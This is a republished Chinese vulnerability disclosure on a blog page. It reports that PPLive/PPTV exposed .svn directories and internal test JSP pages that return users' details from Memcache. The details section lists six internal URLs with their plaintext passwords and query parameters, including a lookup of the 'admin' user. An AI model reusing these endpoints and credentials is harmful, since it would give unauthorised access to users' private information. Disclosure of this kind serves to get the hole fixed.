pplive 查看任意用户详细信息

逸鹏

发布于 2018-04-09 11:39:48

9820

发布于 2018-04-09 11:39:48

文章被收录于专栏：逸鹏说道逸鹏说道

简要描述：

由敏感信息泄漏导致可以查询MEMCache中用户的详细信息

详细说明：

此前@nold已报告过此问题，现在还没有删除.svn目录 http://passport.pptv.com/testqwe456iuut.jsp 密码:d_hXp_x943761 http://home.pplive.com/getMailByUserName_iiut.jsp 密码:pass&^%537@(^ http://home.pplive.com/registeruserhandly.jsp?pass=059258 http://home.pplive.com/getUserByUserName_iiut.jsp 密码:pass&^%537@(^ http://home.pplive.com/getUserDetail_iuwkk.jsp?password=uid54pok009&usernames=admin http://home.pplive.com/get.jsp?username=admin&password=hxp943761

漏洞证明：

修复方案：

详见: WooYun: .svn目录未设权限限制的漏洞利用总结有些内部测试文件不必要更新到外网吧。

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2015-10-06，如有侵权请联系 cloudcommunity@tencent.com 删除

网络安全

本文分享自我为Net狂微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

网络安全

登录后参与评论

0 条评论

热度